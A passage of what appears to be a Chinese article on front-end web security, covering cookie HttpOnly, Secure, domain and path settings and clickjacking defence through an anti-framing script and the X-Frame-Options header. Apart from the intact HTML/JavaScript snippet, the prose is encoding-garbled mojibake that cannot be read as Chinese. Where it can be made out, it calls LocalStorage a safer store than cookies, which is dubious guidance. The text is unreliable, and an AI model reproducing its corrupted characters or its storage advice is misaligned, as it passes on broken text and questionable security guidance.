Cookie»ù±¾Éϵõ½ÁËËùÓÐä¯ÀÀÆ÷µÄÖ§³Ö£¬ËùÒÔÍÆ¼öÔÚÏîÄ¿ÖÐʹÓá£ÔÚÍøÕ¾ÖÐʹÓÃJavaScript²Ù×÷CookieÊÇÒ»ÖÖ²»°²È«µÄ×ö·¨£¬ËùÒÔÈç¹ûÓöµ½ÐèҪͨ¹ý´Ë·½Ê½À´´«µÝºÍ±£´æÊý¾ÝµÄÇé¿ö£¬¾ÍÓ¦¸Ã³¢ÊÔʹÓÃÆäËû¸ü°²È«µÄ´úÌæ·½°¸£¬±ÈÈçʹÓÃHTML5ÖеÄLocalStorage¡£
³ýÁ˸øCookieÉèÖÃHttpOnlyÖ®Í⣬»¹ÓÐÁíÍâÒ»¸öºÍ°²È«Ïà¹ØµÄÉèÖ㬼´Secure¡£ÉèÖÃÁËSecureµÄCookieÖ»ÄÜÔÚä¯ÀÀÆ÷ʹÓÃHTTPSÇëÇóʱ±»·¢Ë͵½·þÎñÆ÷¶Ë¡£Èç¹ûCookieÖаüº¬ÓÐÃô¸ÐÐÅÏ¢Õ⽫·Ç³£ÓÐÓá£Èç¹ûÕ¾µãʹÓÃÁËSSL£¬ÔòÓ¦¸ÃÆôÓÃCookieµÄSecureÉèÖá£
CookieµÄÁíÍâÁ½¸ö³£ÓõÄÉèÖÃÊÇdomain£¨Óò£©ºÍpath£¨Â·¾¶£©£¬ÕâÁ½¸öÉèÖÃÊÇÓÃÀ´È·¶¨Cookie×÷ÓÃÓò·¶Î§µÄ¡£Í¨³£Çé¿öÏÂÊDz»ÐèÒªÉèÖÃÕâÁ½¸öÊôÐԵ쬵«Èç¹ûÔÚ´úÂëÖÐÉèÖÃÁËÕâÁ½¸öÊôÐÔ£¬ÔòÓ¦¸Ã°Ñ·¶Î§ÉèÖÃΪ×îСֵ£¬±ÜÃâÔÚ²»Ïà¹ØµÄ·¾¶»òÕßÓòÖзÃÎʵ½Cookie¡£
·ÀÖ¹ÍøÒ³±»ÆäËûÍøÕ¾ÄÚǶΪiframe
ÔÚÉÏÒ»½Ú½éÉÜǰ¶Ë¹¥»÷ÊÖ¶Îʱ£¬½éÉܹý½çÃæ²Ù×÷½Ù³Ö¹¥»÷¡£ÕâÖÖ¹¥»÷ÕýÊÇÀûÓÃÁËÔÚÍøÒ³ÖÐÄÚǶһ¸ö͸Ã÷µÄiframeÀ´´ïµ½ÆÛÆÓû§µÄÄ¿µÄµÄ¡£ËùÒÔ£¬ÎªÁ˱ÜÃâÕâÑùµÄ¹¥»÷£¬¾ÍÒªÈÃÍøÒ³²»Äܹ»±»ÆäËûÍøÕ¾ÄÚǶ¡£´«Í³µÄ·½Ê½ÊÇʹÓÃJavascript´úÂëÀ´×èÖ¹ÍøÒ³±»ÆäËûÍøÒ³Ç¶Ì×£¬Ê×ÏÈÔÚÒ³ÃæÖÐÌí¼ÓÈçϵÄÑùʽ£º
<style id="antiClickjack">body{display:none !important;}</style> ͬʱÌí¼ÓÀàËÆÈçϵÄJavaScript´úÂ룺 <script type="text/javascript"> if (self === top) { var antiClickjack = document.getElementById("antiClickjack"); antiClickjack.parentNode.removeChild(antiClickjack); } else { top.location = self.location; } </script> |
ÈçÉϵĴúÂëÊ×ÏÈÉèÖÃÁËÕû¸öÒ³Ãæ²»¿É¼û£¬ËæºóÔÚJavaScript´úÂëÖмì²âÒ³ÃæÊÇ·ñ±»ÄÚǶ¡£Èç¹ûûÓб»ÄÚǶ£¬ÔòÒÆ³ýÉèÖÃÒ³Ãæ²»¿É¼ûµÄÑùʽ£¬·ñÔò°Ñ¶¥²ãÒ³ÃæµÄµØÖ·ÉèÖÃΪÄÚÇ¶Ò³ÃæµÄµØÖ·£¬´Ó¶ø×èÖ¹ÁËÒ³ÃæµÄÄÚǶ¡£
ä¯ÀÀÆ÷Ò²Ö§³Öͨ¹ýÉèÖÃX-Frame-Options ÏìӦͷÀ´¿ØÖÆÒ³Ãæ±»ÆäËûÒ³ÃæÄÚǶ¡£X-Frame-OptionsÓÐÈýÖÖÉèÖÃÑ¡Ïdeny¡¢sameoriginÒÔ¼°allowfrom
url¡£·Ö±ð±íʾ½ûÖ¹¡¢ÔÊÐíÏàͬÓò¼°Ìض¨URLÒ³ÃæÄÚǶ´ËÒ³Ãæ¡£Ä¿Ç°Ö»ÓÐallowfromÑ¡Ïî´æÔÚä¯ÀÀÆ÷¼æÈÝÎÊÌ⣬ÆäËûÁ½ÖÖÑ¡Ïî¶¼µÃµ½Á˴󲿷Öä¯ÀÀÆ÷µÄÖ§³Ö¡£ËùÒÔ´Óä¯ÀÀÆ÷¼æÈÝÐÔÉÏÀ´Ëµ£¬½Å±¾µÄ·½Ê½ÊÇĿǰÓÃÀ´×èÖ¹ÍøÒ³±»ÄÚǶµÄ×î¼Ñ·½Ê½¡£µ±È»£¬Èç¹ûÍøÕ¾½ö½öÊÇÒª½ûÖ¹±»ÄÚǶ£¬ÔòÉèÖÃX-Frame-OptionsÊÇ×î¼òµ¥ÓÐЧµÄ·½°¸¡£
ËùνµÀ¸ßÒ»³ß£¬Ä§¸ßÒ»ÕÉ¡£°²È«ÎÊÌâ»áËæ×Åʱ¼äµÄÍÆÒÆ³öÏÖÐµĹ¥»÷·½Ê½£¬ËùÒÔ¿ª·¢ÕßÐèÒªÔÚ±àдǰ¶Ë´úÂëʱ±£³Ö°²È«Òâʶ£¬²»¶Ï¼ÓÇ¿·À·¶ÊֶΡ£ |